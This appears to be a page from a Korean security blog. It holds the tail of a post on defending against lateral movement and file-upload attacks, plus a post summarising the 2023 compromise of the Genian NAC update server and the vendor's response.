측면 이동	- 더 많은 서버와 PC의 권한을 획득하는 것이 목적 - 정상 인증정보 확보 또는 솔루션 취약점 악용

2.3 대응방안

구분	설명
파일 업로드 취약점 원인 제거 및 관리	- 여러 곳에 구현된 업로드 기능을 우선적 파악 - 일반적인 기능 외에도 다양한 업로드 기능이 존재할수 있음 - 예시: 업로드 허용 확장자, 타입, 용량 제한 / 업로드 경로 실행권한 제거 / 업로드 경로 분리 등
서버 내 인증정보 관리	- 비밀번호 하드코딩 금지 - 필요시 암호화 적용 및 엄격한 파일 권한 설정
비밀번호 설정 및 점검 강화	- 유추하기 쉬운 키워드가 포함되지 않도록 설정 - 비밀번호 설정 정책, 가이드, 교육 외에도 실제 점검을 수반
솔루션 점검 및 계정 모니터	- 솔루션은 다수의 PC 및 서버와 연동되어 있으며, 높은 권한을 지님 - 솔루션 자체에 대해서도 계정, 포트, 정책 등 다양한 점검이 필요

3. 결론

- 솔루션 도입을 통해 효율적으로 관리를 시도하나, 관리 인원이 추가되지 않고 관리 요소만 증가하는 경향

- 공격자들은 이미 수년전부터 공급자인 제조사를 해킹해 소스코드 탈취해 취약점 확보 후 공격에 악용

- 패치 되지 않았거나, 계정 관리가 되지 않거나, 중앙 집중 관리 솔루션 등에 대해 접근통제 및 모니터링 필요

4. 참고

[1] https://www.fsec.or.kr/bbs/detail?menuNo=1011&bbsNo=11420
[2] https://www.boannews.com/media/view.asp?idx=127420&page=1&kind=1

'취약점 > 기타' 카테고리의 다른 글

VPN 취약점 (TunnelCrack, TunnelVision) (1)	2024.05.12
PuTTY 취약점 vuln-p521-bias (CVE-2024-31497) (0)	2024.04.19
KISA 브라우저 자동 로그인 비활성화 및 주의 권고 (0)	2024.03.08
Atlassian, Oracle, GNU S/W 취약점 보안 조치 권고 (0)	2024.02.02
SSH Terrapin Attack (CVE-2023-48795) (0)	2024.01.20

지니언스 NAC 업데이트 서버 해킹

2023. 7. 5. 17:33

1. 개요

- 23.06.07 지니언스社 Genian NAC 업데이트 서버에 침해사고 의심 정황 발견
> Genian NAC 솔루션 고객사는 금융권, 가상자산 거래소, 제약회사, 방송사, 언로사 등 약 2400 곳
> 23.06.07 경찰의 본사 시스템 조사 후 23.06.08 KISA 신고
> 23.06.30 홈페이지에 관련 입장문 게시
※ 지니언스: NAC, EDR 솔루션 등을 제공하는 보안 기업
※ Genian NAC: 지니언스에서 개발 및 서비스하는 네트워크 접근 제어 솔루션
※ NAC: 네트워크에 접속하는 사용자나 기기를 식별, 인증, 통제

2. 주요내용

- 지니언스 업데이트 서버에서 고객사 NAC 정책서버로 임의의 파일이(확인되지 않은 파일) 전송된 것을 확인
> 업데이트 서버가 침해되었다고 판단 후 공격자 및 침투 경로 확인 중
※ 업데이트 서버는 클라우드에 위치해 고객사에 설치된 NAC 정책서버와 통신하여 GPDB(Genian Platform DB) 등 동작에 필요한 정보를 주기적으로 업데이트하는 기능을 수행

- 솔루션 자동 업데이트를 설정한 고객사를 중심으로 피해 사례가 확산
> 자동 업데이트를 설정한 고객사에 관련 정보 통보

- 업데이트 서버의 로그 파일 전수 조사를 통해 파일이 전송된 일부 고객사 확인 및 고지 조치
> 관계당국과 협조하여 고객사의 침해 여부 조사 및 장비 교체 완료

- 현재까지 확인된 사항
① 고객사 피해는 확인되지 않음
② 기존 업데이트 체계 전면 중단
③ 새로운 업데이트 체계 및 서버 준비 완료
④ Genian NAC 패치 준비 완료
⑤ 침해 여부 확인을 위한 점검 툴 개발 완료 및 배포

3. 기타

- EDR, GPI(내PC지키미) 및 Cloud NAC 제품은 영향 없음
- 고객의 NAC 정책 서버가 폐쇄망에 설치되어 있는 경우 영향 없음
- 추가 진행사항이 있는 경우 지속적 공지 약속

4. 참고

[1] https://www.genians.co.kr/notice/2023
[2] https://www.boannews.com/media/view.asp?idx=119744
[3] https://www.edaily.co.kr/news/read?newsId=02912646635646968&mediaCodeNo=257&OutLnkChk=Y

'취약점 > Supply-Chain Attack' 카테고리의 다른 글

IPany VPN 공급망 공격 (0)	2025.01.26
Apple CocoaPods 공급망 공격 (0)	2024.07.03
XZ Utils 라이브러리 백도어 (CVE-2024-3094) (0)	2024.04.01
리포재킹(Repojacking) 공격 (0)	2023.09.14
3CX 공급망 공격 (0)	2023.04.06

PREV 이전 1 2 NEXT 다음